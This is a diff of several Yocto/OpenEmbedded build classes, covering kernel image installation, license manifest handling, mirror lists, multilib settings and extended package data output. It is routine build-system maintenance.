379 oe_runmake DEPMOD=echo MODLIB=${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION} INSTALL_FW_PATH=${D}${nonarch_base_libdir}/firmware modules_install 407 oe_runmake DEPMOD=echo MODLIB=${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION} INSTALL_FW_PATH=${D}${nonarch_base_libdir}/firmware modules_install
380 rm "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/build" 408 rm -f "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/build"
381 rm "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/source" 409 rm -f "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/source"
382 # If the kernel/ directory is empty remove it to prevent QA issues 410 # If the kernel/ directory is empty remove it to prevent QA issues
383 rmdir --ignore-fail-on-non-empty "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/kernel" 411 rmdir --ignore-fail-on-non-empty "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/kernel"
384 else 412 else
@@ -390,12 +418,26 @@ kernel_do_install() {
390 # 418 #
391 install -d ${D}/${KERNEL_IMAGEDEST} 419 install -d ${D}/${KERNEL_IMAGEDEST}
392 install -d ${D}/boot 420 install -d ${D}/boot
421
422 #
423 # When including an initramfs bundle inside a FIT image, the fitImage is created after the install task
424 # by do_assemble_fitimage_initramfs.
425 # This happens after the generation of the initramfs bundle (done by do_bundle_initramfs).
426 # So, at the level of the install task we should not try to install the fitImage. fitImage is still not
427 # generated yet.
428 # After the generation of the fitImage, the deploy task copies the fitImage from the build directory to
429 # the deploy folder.
430 #
431
393 for imageType in ${KERNEL_IMAGETYPES} ; do 432 for imageType in ${KERNEL_IMAGETYPES} ; do
394 install -m 0644 ${KERNEL_OUTPUT_DIR}/${imageType} ${D}/${KERNEL_IMAGEDEST}/${imageType}-${KERNEL_VERSION} 433 if [ $imageType != "fitImage" ] || [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ] ; then
395 if [ "${KERNEL_PACKAGE_NAME}" = "kernel" ]; then 434 install -m 0644 ${KERNEL_OUTPUT_DIR}/${imageType} ${D}/${KERNEL_IMAGEDEST}/${imageType}-${KERNEL_VERSION}
396 ln -sf ${imageType}-${KERNEL_VERSION} ${D}/${KERNEL_IMAGEDEST}/${imageType} 435 if [ "${KERNEL_PACKAGE_NAME}" = "kernel" ]; then
436 ln -sf ${imageType}-${KERNEL_VERSION} ${D}/${KERNEL_IMAGEDEST}/${imageType}
437 fi
397 fi 438 fi
398 done 439 done
440
399 install -m 0644 System.map ${D}/boot/System.map-${KERNEL_VERSION} 441 install -m 0644 System.map ${D}/boot/System.map-${KERNEL_VERSION}
400 install -m 0644 .config ${D}/boot/config-${KERNEL_VERSION} 442 install -m 0644 .config ${D}/boot/config-${KERNEL_VERSION}
401 install -m 0644 vmlinux ${D}/boot/vmlinux-${KERNEL_VERSION} 443 install -m 0644 vmlinux ${D}/boot/vmlinux-${KERNEL_VERSION}
@@ -403,7 +445,6 @@ kernel_do_install() {
403 install -d ${D}${sysconfdir}/modules-load.d 445 install -d ${D}${sysconfdir}/modules-load.d
404 install -d ${D}${sysconfdir}/modprobe.d 446 install -d ${D}${sysconfdir}/modprobe.d
405} 447}
406do_install[prefuncs] += "package_get_auto_pr"
407 448
408# Must be ran no earlier than after do_kernel_checkout or else Makefile won't be in ${S}/Makefile 449# Must be ran no earlier than after do_kernel_checkout or else Makefile won't be in ${S}/Makefile
409do_kernel_version_sanity_check() { 450do_kernel_version_sanity_check() {
@@ -569,11 +610,11 @@ do_savedefconfig() {
569do_savedefconfig[nostamp] = "1" 610do_savedefconfig[nostamp] = "1"
570addtask savedefconfig after do_configure 611addtask savedefconfig after do_configure
571 612
572inherit cml1 613inherit cml1 pkgconfig
573 614
574KCONFIG_CONFIG_COMMAND_append = " LD='${KERNEL_LD}' HOSTLDFLAGS='${BUILD_LDFLAGS}'" 615KCONFIG_CONFIG_COMMAND_append = " LD='${KERNEL_LD}' HOSTLDFLAGS='${BUILD_LDFLAGS}'"
575 616
576EXPORT_FUNCTIONS do_compile do_install do_configure 617EXPORT_FUNCTIONS do_compile do_transform_kernel do_transform_bundled_initramfs do_install do_configure
577 618
578# kernel-base becomes kernel-${KERNEL_VERSION} 619# kernel-base becomes kernel-${KERNEL_VERSION}
579# kernel-image becomes kernel-image-${KERNEL_VERSION} 620# kernel-image becomes kernel-image-${KERNEL_VERSION}
@@ -679,7 +720,7 @@ do_sizecheck() {
679 at_least_one_fits= 720 at_least_one_fits=
680 for imageType in ${KERNEL_IMAGETYPES} ; do 721 for imageType in ${KERNEL_IMAGETYPES} ; do
681 size=`du -ks ${B}/${KERNEL_OUTPUT_DIR}/$imageType | awk '{print $1}'` 722 size=`du -ks ${B}/${KERNEL_OUTPUT_DIR}/$imageType | awk '{print $1}'`
682 if [ $size -ge ${KERNEL_IMAGE_MAXSIZE} ]; then 723 if [ $size -gt ${KERNEL_IMAGE_MAXSIZE} ]; then
683 bbwarn "This kernel $imageType (size=$size(K) > ${KERNEL_IMAGE_MAXSIZE}(K)) is too big for your device." 724 bbwarn "This kernel $imageType (size=$size(K) > ${KERNEL_IMAGE_MAXSIZE}(K)) is too big for your device."
684 else 725 else
685 at_least_one_fits=y 726 at_least_one_fits=y
@@ -718,7 +759,7 @@ kernel_do_deploy() {
718 fi 759 fi
719 760
720 if [ ! -z "${INITRAMFS_IMAGE}" -a x"${INITRAMFS_IMAGE_BUNDLE}" = x1 ]; then 761 if [ ! -z "${INITRAMFS_IMAGE}" -a x"${INITRAMFS_IMAGE_BUNDLE}" = x1 ]; then
721 for imageType in ${KERNEL_IMAGETYPE_FOR_MAKE} ; do 762 for imageType in ${KERNEL_IMAGETYPES} ; do
722 if [ "$imageType" = "fitImage" ] ; then 763 if [ "$imageType" = "fitImage" ] ; then
723 continue 764 continue
724 fi 765 fi
diff --git a/meta/classes/libc-package.bbclass b/meta/classes/libc-package.bbclass
index de3b4250c7..72f489d673 100644
--- a/meta/classes/libc-package.bbclass
+++ b/meta/classes/libc-package.bbclass
@@ -45,6 +45,7 @@ PACKAGE_NO_GCONV ?= "0"
45OVERRIDES_append = ":${TARGET_ARCH}-${TARGET_OS}" 45OVERRIDES_append = ":${TARGET_ARCH}-${TARGET_OS}"
46 46
47locale_base_postinst_ontarget() { 47locale_base_postinst_ontarget() {
48mkdir ${libdir}/locale
48localedef --inputfile=${datadir}/i18n/locales/%s --charmap=%s %s 49localedef --inputfile=${datadir}/i18n/locales/%s --charmap=%s %s
49} 50}
50 51
@@ -355,7 +356,7 @@ python package_do_split_gconvs () {
355 m.write("\t@echo 'Progress %d/%d'\n" % (i, total)) 356 m.write("\t@echo 'Progress %d/%d'\n" % (i, total))
356 m.write("\t" + makerecipe + "\n\n") 357 m.write("\t" + makerecipe + "\n\n")
357 d.setVar("EXTRA_OEMAKE", "-C %s ${PARALLEL_MAKE}" % (os.path.dirname(makefile))) 358 d.setVar("EXTRA_OEMAKE", "-C %s ${PARALLEL_MAKE}" % (os.path.dirname(makefile)))
358 d.setVarFlag("oe_runmake", "progress", "outof:Progress\s(\d+)/(\d+)") 359 d.setVarFlag("oe_runmake", "progress", r"outof:Progress\s(\d+)/(\d+)")
359 bb.note("Executing binary locale generation makefile") 360 bb.note("Executing binary locale generation makefile")
360 bb.build.exec_func("oe_runmake", d) 361 bb.build.exec_func("oe_runmake", d)
361 bb.note("collecting binary locales from locale tree") 362 bb.note("collecting binary locales from locale tree")
diff --git a/meta/classes/license.bbclass b/meta/classes/license.bbclass
index dc91118340..806b5069fd 100644
--- a/meta/classes/license.bbclass
+++ b/meta/classes/license.bbclass
@@ -31,8 +31,8 @@ python do_populate_lic() {
31 f.write("%s: %s\n" % (key, info[key])) 31 f.write("%s: %s\n" % (key, info[key]))
32} 32}
33 33
34PSEUDO_IGNORE_PATHS .= ",${@','.join(((d.getVar('COMMON_LICENSE_DIR') or '') + ' ' + (d.getVar('LICENSE_PATH') or '')).split())}" 34PSEUDO_IGNORE_PATHS .= ",${@','.join(((d.getVar('COMMON_LICENSE_DIR') or '') + ' ' + (d.getVar('LICENSE_PATH') or '') + ' ' + d.getVar('COREBASE') + '/meta/COPYING').split())}"
35# it would be better to copy them in do_install_append, but find_license_filesa is python 35# it would be better to copy them in do_install:append, but find_license_filesa is python
36python perform_packagecopy_prepend () { 36python perform_packagecopy_prepend () {
37 enabled = oe.data.typed_value('LICENSE_CREATE_PACKAGE', d) 37 enabled = oe.data.typed_value('LICENSE_CREATE_PACKAGE', d)
38 if d.getVar('CLASSOVERRIDE') == 'class-target' and enabled: 38 if d.getVar('CLASSOVERRIDE') == 'class-target' and enabled:
@@ -91,17 +91,17 @@ def copy_license_files(lic_files_paths, destdir):
91 os.link(src, dst) 91 os.link(src, dst)
92 except OSError as err: 92 except OSError as err:
93 if err.errno == errno.EXDEV: 93 if err.errno == errno.EXDEV:
94 # Copy license files if hard-link is not possible even if st_dev is the 94 # Copy license files if hardlink is not possible even if st_dev is the
95 # same on source and destination (docker container with device-mapper?) 95 # same on source and destination (docker container with device-mapper?)
96 canlink = False 96 canlink = False
97 else: 97 else:
98 raise 98 raise
99 # Only chown if we did hardling, and, we're running under pseudo 99 # Only chown if we did hardlink and we're running under pseudo
100 if canlink and os.environ.get('PSEUDO_DISABLED') == '0': 100 if canlink and os.environ.get('PSEUDO_DISABLED') == '0':
101 os.chown(dst,0,0) 101 os.chown(dst,0,0)
102 if not canlink: 102 if not canlink:
103 begin_idx = int(beginline)-1 if beginline is not None else None 103 begin_idx = max(0, int(beginline) - 1) if beginline is not None else None
104 end_idx = int(endline) if endline is not None else None 104 end_idx = max(0, int(endline)) if endline is not None else None
105 if begin_idx is None and end_idx is None: 105 if begin_idx is None and end_idx is None:
106 shutil.copyfile(src, dst) 106 shutil.copyfile(src, dst)
107 else: 107 else:
@@ -153,6 +153,10 @@ def find_license_files(d):
153 find_license(node.s.replace("+", "").replace("*", "")) 153 find_license(node.s.replace("+", "").replace("*", ""))
154 self.generic_visit(node) 154 self.generic_visit(node)
155 155
156 def visit_Constant(self, node):
157 find_license(node.value.replace("+", "").replace("*", ""))
158 self.generic_visit(node)
159
156 def find_license(license_type): 160 def find_license(license_type):
157 try: 161 try:
158 bb.utils.mkdirhier(gen_lic_dest) 162 bb.utils.mkdirhier(gen_lic_dest)
diff --git a/meta/classes/license_image.bbclass b/meta/classes/license_image.bbclass
index a69cc5f065..325b3cbba7 100644
--- a/meta/classes/license_image.bbclass
+++ b/meta/classes/license_image.bbclass
@@ -1,3 +1,5 @@
1ROOTFS_LICENSE_DIR = "${IMAGE_ROOTFS}/usr/share/common-licenses"
2
1python write_package_manifest() { 3python write_package_manifest() {
2 # Get list of installed packages 4 # Get list of installed packages
3 license_image_dir = d.expand('${LICENSE_DIRECTORY}/${IMAGE_NAME}') 5 license_image_dir = d.expand('${LICENSE_DIRECTORY}/${IMAGE_NAME}')
@@ -7,8 +9,8 @@ python write_package_manifest() {
7 9
8 pkgs = image_list_installed_packages(d) 10 pkgs = image_list_installed_packages(d)
9 output = format_pkg_list(pkgs) 11 output = format_pkg_list(pkgs)
10 open(os.path.join(license_image_dir, 'package.manifest'), 12 with open(os.path.join(license_image_dir, 'package.manifest'), "w+") as package_manifest:
11 'w+').write(output) 13 package_manifest.write(output)
12} 14}
13 15
14python license_create_manifest() { 16python license_create_manifest() {
@@ -105,8 +107,7 @@ def write_license_files(d, license_manifest, pkg_dic, rootfs=True):
105 copy_lic_manifest = d.getVar('COPY_LIC_MANIFEST') 107 copy_lic_manifest = d.getVar('COPY_LIC_MANIFEST')
106 copy_lic_dirs = d.getVar('COPY_LIC_DIRS') 108 copy_lic_dirs = d.getVar('COPY_LIC_DIRS')
107 if rootfs and copy_lic_manifest == "1": 109 if rootfs and copy_lic_manifest == "1":
108 rootfs_license_dir = os.path.join(d.getVar('IMAGE_ROOTFS'), 110 rootfs_license_dir = d.getVar('ROOTFS_LICENSE_DIR')
109 'usr', 'share', 'common-licenses')
110 bb.utils.mkdirhier(rootfs_license_dir) 111 bb.utils.mkdirhier(rootfs_license_dir)
111 rootfs_license_manifest = os.path.join(rootfs_license_dir, 112 rootfs_license_manifest = os.path.join(rootfs_license_dir,
112 os.path.split(license_manifest)[1]) 113 os.path.split(license_manifest)[1])
@@ -144,12 +145,13 @@ def write_license_files(d, license_manifest, pkg_dic, rootfs=True):
144 continue 145 continue
145 146
146 # Make sure we use only canonical name for the license file 147 # Make sure we use only canonical name for the license file
147 rootfs_license = os.path.join(rootfs_license_dir, "generic_%s" % generic_lic) 148 generic_lic_file = "generic_%s" % generic_lic
149 rootfs_license = os.path.join(rootfs_license_dir, generic_lic_file)
148 if not os.path.exists(rootfs_license): 150 if not os.path.exists(rootfs_license):
149 oe.path.copyhardlink(pkg_license, rootfs_license) 151 oe.path.copyhardlink(pkg_license, rootfs_license)
150 152
151 if not os.path.exists(pkg_rootfs_license): 153 if not os.path.exists(pkg_rootfs_license):
152 os.symlink(os.path.join('..', lic), pkg_rootfs_license) 154 os.symlink(os.path.join('..', generic_lic_file), pkg_rootfs_license)
153 else: 155 else:
154 if (oe.license.license_ok(canonical_license(d, 156 if (oe.license.license_ok(canonical_license(d,
155 lic), bad_licenses) == False or 157 lic), bad_licenses) == False or
@@ -209,7 +211,7 @@ def get_deployed_dependencies(d):
209 deploy = {} 211 deploy = {}
210 # Get all the dependencies for the current task (rootfs). 212 # Get all the dependencies for the current task (rootfs).
211 taskdata = d.getVar("BB_TASKDEPDATA", False) 213 taskdata = d.getVar("BB_TASKDEPDATA", False)
212 pn = d.getVar("PN", True) 214 pn = d.getVar("PN")
213 depends = list(set([dep[0] for dep 215 depends = list(set([dep[0] for dep
214 in list(taskdata.values()) 216 in list(taskdata.values())
215 if not dep[0].endswith("-native") and not dep[0] == pn])) 217 if not dep[0].endswith("-native") and not dep[0] == pn]))
@@ -256,3 +258,13 @@ python do_populate_lic_deploy() {
256addtask populate_lic_deploy before do_build after do_image_complete 258addtask populate_lic_deploy before do_build after do_image_complete
257do_populate_lic_deploy[recrdeptask] += "do_populate_lic do_deploy" 259do_populate_lic_deploy[recrdeptask] += "do_populate_lic do_deploy"
258 260
261python license_qa_dead_symlink() {
262 import os
263
264 for root, dirs, files in os.walk(d.getVar('ROOTFS_LICENSE_DIR')):
265 for file in files:
266 full_path = root + "/" + file
267 if os.path.islink(full_path) and not os.path.exists(full_path):
268 bb.error("broken symlink: " + full_path)
269}
270IMAGE_QA_COMMANDS += "license_qa_dead_symlink"
diff --git a/meta/classes/linux-dummy.bbclass b/meta/classes/linux-dummy.bbclass
new file mode 100644
index 0000000000..cd8791557d
--- /dev/null
+++ b/meta/classes/linux-dummy.bbclass
@@ -0,0 +1,26 @@
1
2python __anonymous () {
3 if d.getVar('PREFERRED_PROVIDER_virtual/kernel') == 'linux-dummy':
4 # copy part codes from kernel.bbclass
5 kname = d.getVar('KERNEL_PACKAGE_NAME') or "kernel"
6
7 # set an empty package of kernel-devicetree
8 d.appendVar('PACKAGES', ' %s-devicetree' % kname)
9 d.setVar('ALLOW_EMPTY_%s-devicetree' % kname, '1')
10
11 # Merge KERNEL_IMAGETYPE and KERNEL_ALT_IMAGETYPE into KERNEL_IMAGETYPES
12 type = d.getVar('KERNEL_IMAGETYPE') or ""
13 alttype = d.getVar('KERNEL_ALT_IMAGETYPE') or ""
14 types = d.getVar('KERNEL_IMAGETYPES') or ""
15 if type not in types.split():
16 types = (type + ' ' + types).strip()
17 if alttype not in types.split():
18 types = (alttype + ' ' + types).strip()
19
20 # set empty packages of kernel-image-*
21 for type in types.split():
22 typelower = type.lower()
23 d.appendVar('PACKAGES', ' %s-image-%s' % (kname, typelower))
24 d.setVar('ALLOW_EMPTY_%s-image-%s' % (kname, typelower), '1')
25}
26
diff --git a/meta/classes/metadata_scm.bbclass b/meta/classes/metadata_scm.bbclass
index 2608a7ef7b..47cb969b8d 100644
--- a/meta/classes/metadata_scm.bbclass
+++ b/meta/classes/metadata_scm.bbclass
@@ -1,8 +1,3 @@
1METADATA_BRANCH ?= "${@base_detect_branch(d)}"
2METADATA_BRANCH[vardepvalue] = "${METADATA_BRANCH}"
3METADATA_REVISION ?= "${@base_detect_revision(d)}"
4METADATA_REVISION[vardepvalue] = "${METADATA_REVISION}"
5
6def base_detect_revision(d): 1def base_detect_revision(d):
7 path = base_get_scmbasepath(d) 2 path = base_get_scmbasepath(d)
8 return base_get_metadata_git_revision(path, d) 3 return base_get_metadata_git_revision(path, d)
@@ -42,3 +37,8 @@ def base_get_metadata_git_revision(path, d):
42 except bb.process.ExecutionError: 37 except bb.process.ExecutionError:
43 rev = '<unknown>' 38 rev = '<unknown>'
44 return rev.strip() 39 return rev.strip()
40
41METADATA_BRANCH := "${@base_detect_branch(d)}"
42METADATA_BRANCH[vardepvalue] = "${METADATA_BRANCH}"
43METADATA_REVISION := "${@base_detect_revision(d)}"
44METADATA_REVISION[vardepvalue] = "${METADATA_REVISION}"
diff --git a/meta/classes/mirrors.bbclass b/meta/classes/mirrors.bbclass
index 87bba41472..669d0cc8ff 100644
--- a/meta/classes/mirrors.bbclass
+++ b/meta/classes/mirrors.bbclass
@@ -29,7 +29,6 @@ ftp://dante.ctan.org/tex-archive ftp://ftp.fu-berlin.de/tex/CTAN \n \
29ftp://dante.ctan.org/tex-archive http://sunsite.sut.ac.jp/pub/archives/ctan/ \n \ 29ftp://dante.ctan.org/tex-archive http://sunsite.sut.ac.jp/pub/archives/ctan/ \n \
30ftp://dante.ctan.org/tex-archive http://ctan.unsw.edu.au/ \n \ 30ftp://dante.ctan.org/tex-archive http://ctan.unsw.edu.au/ \n \
31ftp://ftp.gnutls.org/gcrypt/gnutls ${GNUPG_MIRROR}/gnutls \n \ 31ftp://ftp.gnutls.org/gcrypt/gnutls ${GNUPG_MIRROR}/gnutls \n \
32http://ftp.info-zip.org/pub/infozip/src/ http://mirror.switch.ch/ftp/mirror/infozip/src/ \n \
33http://ftp.info-zip.org/pub/infozip/src/ ftp://sunsite.icm.edu.pl/pub/unix/archiving/info-zip/src/ \n \ 32http://ftp.info-zip.org/pub/infozip/src/ ftp://sunsite.icm.edu.pl/pub/unix/archiving/info-zip/src/ \n \
34http://www.mirrorservice.org/sites/lsof.itap.purdue.edu/pub/tools/unix/lsof/ http://www.mirrorservice.org/sites/lsof.itap.purdue.edu/pub/tools/unix/lsof/OLD/ \n \ 33http://www.mirrorservice.org/sites/lsof.itap.purdue.edu/pub/tools/unix/lsof/ http://www.mirrorservice.org/sites/lsof.itap.purdue.edu/pub/tools/unix/lsof/OLD/ \n \
35${APACHE_MIRROR} http://www.us.apache.org/dist \n \ 34${APACHE_MIRROR} http://www.us.apache.org/dist \n \
@@ -43,6 +42,7 @@ ftp://sourceware.org/pub http://ftp.gwdg.de/pub/linux/sources.redhat.com/sourcew
43cvs://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \ 42cvs://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
44svn://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \ 43svn://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
45git://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \ 44git://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
45gitsm://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
46hg://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \ 46hg://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
47bzr://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \ 47bzr://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
48p4://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \ 48p4://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
@@ -53,6 +53,7 @@ npm://.*/?.* http://downloads.yoctoproject.org/mirror/sources/ \n \
53cvs://.*/.* http://sources.openembedded.org/ \n \ 53cvs://.*/.* http://sources.openembedded.org/ \n \
54svn://.*/.* http://sources.openembedded.org/ \n \ 54svn://.*/.* http://sources.openembedded.org/ \n \
55git://.*/.* http://sources.openembedded.org/ \n \ 55git://.*/.* http://sources.openembedded.org/ \n \
56gitsm://.*/.* http://sources.openembedded.org/ \n \
56hg://.*/.* http://sources.openembedded.org/ \n \ 57hg://.*/.* http://sources.openembedded.org/ \n \
57bzr://.*/.* http://sources.openembedded.org/ \n \ 58bzr://.*/.* http://sources.openembedded.org/ \n \
58p4://.*/.* http://sources.openembedded.org/ \n \ 59p4://.*/.* http://sources.openembedded.org/ \n \
@@ -62,6 +63,8 @@ ftp://.*/.* http://sources.openembedded.org/ \n \
62npm://.*/?.* http://sources.openembedded.org/ \n \ 63npm://.*/?.* http://sources.openembedded.org/ \n \
63${CPAN_MIRROR} http://cpan.metacpan.org/ \n \ 64${CPAN_MIRROR} http://cpan.metacpan.org/ \n \
64${CPAN_MIRROR} http://search.cpan.org/CPAN/ \n \ 65${CPAN_MIRROR} http://search.cpan.org/CPAN/ \n \
66https?$://downloads.yoctoproject.org/releases/uninative/ https://mirrors.kernel.org/yocto/uninative/ \n \
67https?$://downloads.yoctoproject.org/mirror/sources/ https://mirrors.kernel.org/yocto-sources/ \n \
65" 68"
66 69
67# Use MIRRORS to provide git repo fallbacks using the https protocol, for cases 70# Use MIRRORS to provide git repo fallbacks using the https protocol, for cases
diff --git a/meta/classes/multilib.bbclass b/meta/classes/multilib.bbclass
index ee677da1e2..b5c59ac593 100644
--- a/meta/classes/multilib.bbclass
+++ b/meta/classes/multilib.bbclass
@@ -45,6 +45,7 @@ python multilib_virtclass_handler () {
45 e.data.setVar("RECIPE_SYSROOT", "${WORKDIR}/recipe-sysroot") 45 e.data.setVar("RECIPE_SYSROOT", "${WORKDIR}/recipe-sysroot")
46 e.data.setVar("STAGING_DIR_TARGET", "${WORKDIR}/recipe-sysroot") 46 e.data.setVar("STAGING_DIR_TARGET", "${WORKDIR}/recipe-sysroot")
47 e.data.setVar("STAGING_DIR_HOST", "${WORKDIR}/recipe-sysroot") 47 e.data.setVar("STAGING_DIR_HOST", "${WORKDIR}/recipe-sysroot")
48 e.data.setVar("RECIPE_SYSROOT_MANIFEST_SUBDIR", "nativesdk-" + variant)
48 e.data.setVar("MLPREFIX", variant + "-") 49 e.data.setVar("MLPREFIX", variant + "-")
49 override = ":virtclass-multilib-" + variant 50 override = ":virtclass-multilib-" + variant
50 e.data.setVar("OVERRIDES", e.data.getVar("OVERRIDES", False) + override) 51 e.data.setVar("OVERRIDES", e.data.getVar("OVERRIDES", False) + override)
@@ -106,7 +107,6 @@ python __anonymous () {
106 d.setVar("LINGUAS_INSTALL", "") 107 d.setVar("LINGUAS_INSTALL", "")
107 # FIXME, we need to map this to something, not delete it! 108 # FIXME, we need to map this to something, not delete it!
108 d.setVar("PACKAGE_INSTALL_ATTEMPTONLY", "") 109 d.setVar("PACKAGE_INSTALL_ATTEMPTONLY", "")
109 bb.build.deltask('do_populate_sdk', d)
110 bb.build.deltask('do_populate_sdk_ext', d) 110 bb.build.deltask('do_populate_sdk_ext', d)
111 return 111 return
112 112
diff --git a/meta/classes/nativesdk.bbclass b/meta/classes/nativesdk.bbclass
index 7f2692c51a..dc5a9756b6 100644
--- a/meta/classes/nativesdk.bbclass
+++ b/meta/classes/nativesdk.bbclass
@@ -113,3 +113,5 @@ do_packagedata[stamp-extra-info] = ""
113USE_NLS = "${SDKUSE_NLS}" 113USE_NLS = "${SDKUSE_NLS}"
114 114
115OLDEST_KERNEL = "${SDK_OLDEST_KERNEL}" 115OLDEST_KERNEL = "${SDK_OLDEST_KERNEL}"
116
117PATH_prepend = "${COREBASE}/scripts/nativesdk-intercept:"
diff --git a/meta/classes/package.bbclass b/meta/classes/package.bbclass
index 15bff9c778..49d30caef7 100644
--- a/meta/classes/package.bbclass
+++ b/meta/classes/package.bbclass
@@ -1140,6 +1140,14 @@ python split_and_strip_files () {
1140 # Modified the file so clear the cache 1140 # Modified the file so clear the cache
1141 cpath.updatecache(file) 1141 cpath.updatecache(file)
1142 1142
1143 def strip_pkgd_prefix(f):
1144 nonlocal dvar
1145
1146 if f.startswith(dvar):
1147 return f[len(dvar):]
1148
1149 return f
1150
1143 # 1151 #
1144 # First lets process debug splitting 1152 # First lets process debug splitting
1145 # 1153 #
@@ -1153,6 +1161,8 @@ python split_and_strip_files () {
1153 for file in staticlibs: 1161 for file in staticlibs:
1154 results.append( (file,source_info(file, d)) ) 1162 results.append( (file,source_info(file, d)) )
1155 1163
1164 d.setVar("PKGDEBUGSOURCES", {strip_pkgd_prefix(f): sorted(s) for f, s in results})
1165
1156 sources = set() 1166 sources = set()
1157 for r in results: 1167 for r in results:
1158 sources.update(r[1]) 1168 sources.update(r[1])
@@ -1460,6 +1470,7 @@ PKGDATA_VARS = "PN PE PV PR PKGE PKGV PKGR LICENSE DESCRIPTION SUMMARY RDEPENDS
1460python emit_pkgdata() { 1470python emit_pkgdata() {
1461 from glob import glob 1471 from glob import glob
1462 import json 1472 import json
1473 import gzip
1463 1474
1464 def process_postinst_on_target(pkg, mlprefix): 1475 def process_postinst_on_target(pkg, mlprefix):
1465 pkgval = d.getVar('PKG_%s' % pkg) 1476 pkgval = d.getVar('PKG_%s' % pkg)
@@ -1532,6 +1543,8 @@ fi
1532 with open(data_file, 'w') as fd: 1543 with open(data_file, 'w') as fd:
1533 fd.write("PACKAGES: %s\n" % packages) 1544 fd.write("PACKAGES: %s\n" % packages)
1534 1545
1546 pkgdebugsource = d.getVar("PKGDEBUGSOURCES") or []
1547
1535 pn = d.getVar('PN') 1548 pn = d.getVar('PN')
1536 global_variants = (d.getVar('MULTILIB_GLOBAL_VARIANTS') or "").split() 1549 global_variants = (d.getVar('MULTILIB_GLOBAL_VARIANTS') or "").split()
1537 variants = (d.getVar('MULTILIB_VARIANTS') or "").split() 1550 variants = (d.getVar('MULTILIB_VARIANTS') or "").split()
@@ -1551,17 +1564,32 @@ fi
1551 pkgval = pkg 1564 pkgval = pkg
1552 d.setVar('PKG_%s' % pkg, pkg) 1565 d.setVar('PKG_%s' % pkg, pkg)
1553 1566
1567 extended_data = {
1568 "files_info": {}
1569 }
1570
1554 pkgdestpkg = os.path.join(pkgdest, pkg) 1571 pkgdestpkg = os.path.join(pkgdest, pkg)
1555 files = {} 1572 files = {}
1573 files_extra = {}
1556 total_size = 0 1574 total_size = 0
1557 seen = set() 1575 seen = set()
1558 for f in pkgfiles[pkg]: 1576 for f in pkgfiles[pkg]:
1559 relpth = os.path.relpath(f, pkgdestpkg) 1577 fpath = os.sep + os.path.relpath(f, pkgdestpkg)
1578
1560 fstat = os.lstat(f) 1579 fstat = os.lstat(f)
1561 files[os.sep + relpth] = fstat.st_size 1580 files[fpath] = fstat.st_size
1581
1582 extended_data["files_info"].setdefault(fpath, {})
1583 extended_data["files_info"][fpath]['size'] = fstat.st_size
1584
1562 if fstat.st_ino not in seen: 1585 if fstat.st_ino not in seen:
1563 seen.add(fstat.st_ino) 1586 seen.add(fstat.st_ino)
1564 total_size += fstat.st_size 1587 total_size += fstat.st_size
1588
1589 if fpath in pkgdebugsource:
1590 extended_data["files_info"][fpath]['debugsrc'] = pkgdebugsource[fpath]
1591 del pkgdebugsource[fpath]
1592
1565 d.setVar('FILES_INFO', json.dumps(files, sort_keys=True)) 1593 d.setVar('FILES_INFO', json.dumps(files, sort_keys=True))
1566 1594
1567 process_postinst_on_target(pkg, d.getVar("MLPREFIX")) 1595 process_postinst_on_target(pkg, d.getVar("MLPREFIX"))
@@ -1582,6 +1610,10 @@ fi
1582 1610
1583 sf.write('%s_%s: %d\n' % ('PKGSIZE', pkg, total_size)) 1611 sf.write('%s_%s: %d\n' % ('PKGSIZE', pkg, total_size))
1584 1612
1613 subdata_extended_file = pkgdatadir + "/extended/%s.json.gz" % pkg
1614 with gzip.open(subdata_extended_file, "wt", encoding="utf-8") as f:
1615 json.dump(extended_data, f, sort_keys=True, separators=(",", ":"))
1616
1585 # Symlinks needed for rprovides lookup 1617 # Symlinks needed for rprovides lookup
1586 rprov = d.getVar('RPROVIDES_%s' % pkg) or d.getVar('RPROVIDES') 1618 rprov = d.getVar('RPROVIDES_%s' % pkg) or d.getVar('RPROVIDES')
1587 if rprov: 1619 if rprov:
@@ -1612,7 +1644,8 @@ fi
1612 write_extra_runtime_pkgs(global_variants, packages, pkgdatadir) 1644 write_extra_runtime_pkgs(global_variants, packages, pkgdatadir)
1613 1645
1614} 1646}
1615emit_pkgdata[dirs] = "${PKGDESTWORK}/runtime ${PKGDESTWORK}/runtime-reverse ${PKGDESTWORK}/runtime-rprovides" 1647emit_pkgdata[dirs] = "${PKGDESTWORK}/runtime ${PKGDESTWORK}/runtime-reverse ${PKGDESTWORK}/runtime-rprovides ${PKGDESTWORK}/extended"
1648emit_pkgdata[vardepsexclude] = "BB_NUMBER_THREADS"
1616 1649
1617ldconfig_postinst_fragment() { 1650ldconfig_postinst_fragment() {
1618if [ x"$D" = "x" ]; then 1651if [ x"$D" = "x" ]; then
@@ -1620,7 +1653,7 @@ if [ x"$D" = "x" ]; then
1620fi 1653fi
1621} 1654}
1622 1655
1623RPMDEPS = "${STAGING_LIBDIR_NATIVE}/rpm/rpmdeps --alldeps" 1656RPMDEPS = "${STAGING_LIBDIR_NATIVE}/rpm/rpmdeps --alldeps --define '__font_provides %{nil}'"
1624 1657
1625# Collect perfile run-time dependency metadata 1658# Collect perfile run-time dependency metadata
1626# Output: 1659# Output:
@@ -1989,12 +2022,12 @@ python package_do_pkgconfig () {
1989 for pkg in packages.split(): 2022 for pkg in packages.split():
